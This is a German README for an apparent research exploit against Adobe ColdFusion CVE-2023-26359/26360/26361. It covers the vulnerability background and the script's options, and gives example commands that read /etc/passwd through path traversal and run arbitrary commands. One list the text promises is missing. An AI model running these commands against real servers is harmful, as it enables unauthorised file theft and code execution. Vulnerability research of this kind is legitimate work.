
Python-Exploit-Skript für entferntes Dateilesen und Befehlsausführung, das auf Adobe ColdFusion-Sicherheitslücken CVE-2023-26359, CVE-2023-26360 und CVE-2023-26361 abzielt. Unterstützt beliebiges Dateilesen und RCE über manipulierte Anfragen.
Am 8. März 2023 veröffentlichte Adobe Sicherheitsupdates, um kritische Schwachstellen in Adobe ColdFusion, einer beliebten Webanwendungsentwicklungsplattform, zu beheben. Diese als unzureichende Zugriffskontrolle und unsichere Deserialisierung eingestuften Schwachstellen führen zu nicht autorisierter Codeausführung (RCE), wenn ein Angreifer eine speziell gestaltete Anfrage mit unvertrauenswürdigen Daten an einen ColdFusion-Server sendet.
Die Ausnutzung erfordert keine Benutzerinteraktion, was sie besonders schwerwiegend macht, da sie Angreifern ermöglicht, beliebigen Code im Kontext des aktuellen Benutzers ohne dessen Wissen auszuführen.
Die Cybersecurity and Infrastructure Security Agency (CISA) hob am 5. Dezember 2023 die Schwere dieses Problems hervor, indem sie eine Warnung bezüglich der aktiven Ausnutzung der Schwachstellen veröffentlichte. Sie stellten fest, dass diese Schwachstelle von Cyber-Bedrohungsakteuren genutzt wird, um ersten Zugang zu öffentlich zugänglichen Adobe ColdFusion-Webservern zu erlangen. Die schwerwiegendste Schwachstelle hat einen CVSS-Score von 9,8 und wird als Kritisch eingestuft.
Nach weiteren Untersuchungen wurden im Wesentlichen drei verschiedene Probleme identifiziert:
Dieses Exploit-Skript wurde für eine CVE-Analyse auf vsociety geschrieben.
Hilfe:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
Dieses Exploit-Skript wurde ausschließlich zu Forschungszwecken und zur Entwicklung effektiver Abwehrtechniken erstellt. Es ist nicht für böswillige oder unbefugte Aktivitäten bestimmt. Der Autor und der Eigentümer des Skripts lehnen jegliche Verantwortung oder Haftung für Missbrauch oder Schäden ab, die durch diese Software verursacht werden. Benutzer werden aufgefordert, diese Software verantwortungsvoll und nur in Übereinstimmung mit den geltenden Gesetzen und Vorschriften zu verwenden. Verwenden Sie es verantwortungsvoll.